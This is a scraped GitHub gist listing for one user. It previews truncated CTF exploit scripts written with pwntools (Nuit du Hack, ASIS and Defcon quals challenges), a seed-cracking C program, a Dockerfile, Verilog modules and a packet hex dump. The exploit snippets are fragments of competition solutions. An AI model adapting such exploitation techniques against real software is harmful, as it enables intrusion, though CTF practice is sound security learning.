Skip to content

Instantly share code, notes, and snippets.

View kokjo's full-sized avatar

Jonas Rudloff kokjo

103 followers · 15 following
View GitHub Profile
@kokjo
kokjo / doit_letsenchiffre.py
Last active April 6, 2017 05:54
Exploit for letsenchiffre from Nuit du Hack quals 2017
import letsenchiffre_pb2 as letsenchiffre
from pwn import *
def forge_request(password):
crtreq = letsenchiffre.CertificateRequest()
crtreq.Locality = "A"
crtreq.State = "A"
crtreq.City = "A"
crtreq.Company = "A"
crtreq.CommonName = "A"
@kokjo
kokjo / Dockerfile
Created April 2, 2017 08:04
FROM fedora
RUN dnf -y install glibc.i686 openssl-libs.i686 protobuf-devel.i686 protobuf-lite.i686 protobuf.i686
RUN dnf -y install git scons
RUN dnf -y install gcc
RUN dnf -y install glibc-devel.i686 libgcc.i686 libstdc++-devel.i686
RUN dnf -y install strace
RUN dnf -y install gcc-c++
RUN dnf -y install glibc-devel.x86_64 libgcc.x86_64 libstdc++-devel.x86_64
RUN git clone https://github.com/tsyrogit/zxcvbn-c.git
@kokjo
kokjo / doit.py
Last active June 3, 2019 15:52
Solution to CRC problem from asis ctf 2017
from pwn import *
s = log.waitfor("Calculating CRC reverse lookup table")
reverse_crc = {crc.crc_32(p16(i)): p16(i) for i in range(2**16)}
s.success()
e = ELF("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")
r = process("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")
@MemLeak
@kokjo
kokjo / doit.py
Created April 10, 2017 12:21
Exploit for the challenge random from ASIS Quals CTF 2017
from pwn import *
context.arch = "amd64"
r = process("./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1")
#r = remote("69.90.132.40", 4000)
values = [0]
for i in range(1,8):
r.sendline(str(i))
@kokjo
kokjo / doit_bigpicture.py
Created April 23, 2017 21:16
from pwn import *
def pwnit():
#h, w = (1024, 1024)
w, h = (1024, 1024)
#r.sendline(" "+"0"*4096 + "1 , 0 , A")
#r.recvuntil("> ")
@kokjo
kokjo / doit_gameboy.py
Created April 23, 2017 21:19
Please don't judge!
from pwn import *
def ld_c(num): return [0x0e, num & 0xff]
def ld_a(num): return [0x3e, num & 0xff]
def ld_l(num): return [0x2e, num & 0xff]
def ld_h(num): return [0x26, num & 0xff]
def ld_ff_c_a(): return [0xe2]
def set_iomem(reg, val): return ld_c(reg & 0xff) + ld_a(val) + ld_ff_c_a()
def ld_a_hl_inc(): return [0x2a]
def adc_a_hl(): return [0x8e]
@kokjo
kokjo / crack_seed.c
Created May 1, 2017 12:11
Solution for reeses revenge from Defcon quals 2017
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <pthread.h>
typedef struct {
unsigned int s[32];
unsigned int i;
} ctx_t;
@kokjo
kokjo / ram.v
Created November 12, 2018 21:23
module ram (
clk,
mem_valid, mem_ready,
mem_addr, mem_rdata,
mem_wdata, mem_wstrb
);
input clk;
input mem_valid;
output reg mem_ready;
input [31:0] mem_addr;
@kokjo
kokjo / crc32_top.v
Created May 30, 2019 17:07
`default_nettype none
module crc32_top (
input clk, input rst,
input [7:0] data,
output [31:0] state,
);
reg [31:0] state_reg;
wire [31:0] state_next;
crc32 crc32 (
@kokjo
kokjo / gist:656234dfbca05b499c307571b55fb044
Created May 30, 2019 17:35
00000000: 33 33 00 00 00 16 50 7b 9d 66 8d 42 86 dd 60 00 33....P{.f.B..`.
00000010: 00 00 00 24 00 01 fe 80 00 00 00 00 00 00 52 7b ...$..........R{
00000020: 9d ff fe 66 8d 42 ff 02 00 00 00 00 00 00 00 00 ...f.B..........
00000030: 00 00 00 00 00 16 3a 00 05 02 00 00 01 00 8f 00 ......:.........
00000040: 67 3c 00 00 00 01 04 00 00 00 ff 02 00 00 00 00 g<..............
00000050: 00 00 00 00 00 01 ff 66 8d 42 2c c8 39 4a e5 fd .......f.B,.9J..
00000060: ab 83 33 33 00 00 00 16 50 7b 9d 66 8d 42 86 dd ..33....P{.f.B..
00000070: 60 00 00 00 00 24 00 01 fe 80 00 00 00 00 00 00 `....$..........
00000080: 52 7b 9d ff fe 66 8d 42 ff 02 00 00 00 00 00 00 R{...f.B........
00000090: 00 00 00 00 00 00 00 16 3a 00 05 02 00 00 01 00 ........:.......